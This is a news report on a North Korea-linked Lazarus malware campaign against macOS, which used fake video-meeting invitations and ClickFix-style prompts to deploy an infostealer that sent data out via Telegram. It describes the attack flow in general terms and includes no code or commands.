Signs have been detected that Lazarus, a North Korea-linked hacking group, has been running a new malware campaign targeting macOS environments.

On April 22 local time, blockchain media outlet Cointelegraph reported that the attack targeted not only cryptocurrency companies but also general companies and fintech firms. It said the method combined fake video meeting invitations with social engineering techniques.

Security researchers named the new malware kit "Mach-O Man". The malware spread through a ClickFix-style prompt and made victims think they were joining a fake Zoom or Google Meet session, then induced them to run specific commands themselves.

Mauro Eldritch (마우로 엘드리치), founder of BCA, said in a report released that day that the approach enables malware to be downloaded in the background, bypassing traditional controls without detection.

If the attack succeeds, hackers can obtain credentials and access to internal systems at the victim company. Researchers said the campaign could lead to account takeovers, unauthorized access to infrastructure, financial losses and exposure of critical data. It also showed Lazarus' targets are expanding beyond crypto-only companies to a wider range of industries.

The final stage of the malware deployed an information-stealing program. The tool was designed to collect sensitive information such as browser extension data, stored browser credentials, cookies and macOS keychain items. The collected data was bundled into a compressed file and sent to attackers via Telegram.

The process of deleting traces was also automated. Researchers noted that the malware was configured to delete the entire kit using the system's rm command, and that the process bypasses the user confirmations or permission steps normally required for file deletion. That suggests attackers considered post-incident concealment as well as intrusion and data theft.

The malware kit was reconstructed through the macOS analysis function of cloud-based malware sandbox Any.run. Researchers confirmed the attack flow and data exfiltration path based on that work.

Lazarus has repeatedly been identified as being behind major cryptocurrency hacking incidents. The group was also cited as a prime suspect in the 2025 Bybit hack, and losses were tallied at $1.4 billion. It is the largest hacking case in the industry to date.

Similar social engineering attacks continued this month. Zerion had about $100,000 stolen after some team members lost login sessions and credentials, along with access to the company's private keys. The attack was reported to have used social engineering techniques that leveraged artificial intelligence.

Against this backdrop, the case shows mac-based work environments can no longer be treated as relatively safe. The confirmed attack structure combined video meeting invitations, browser-based authentication and messenger transfers, increasing the need for cryptocurrency and fintech firms to review endpoint security and account management systems.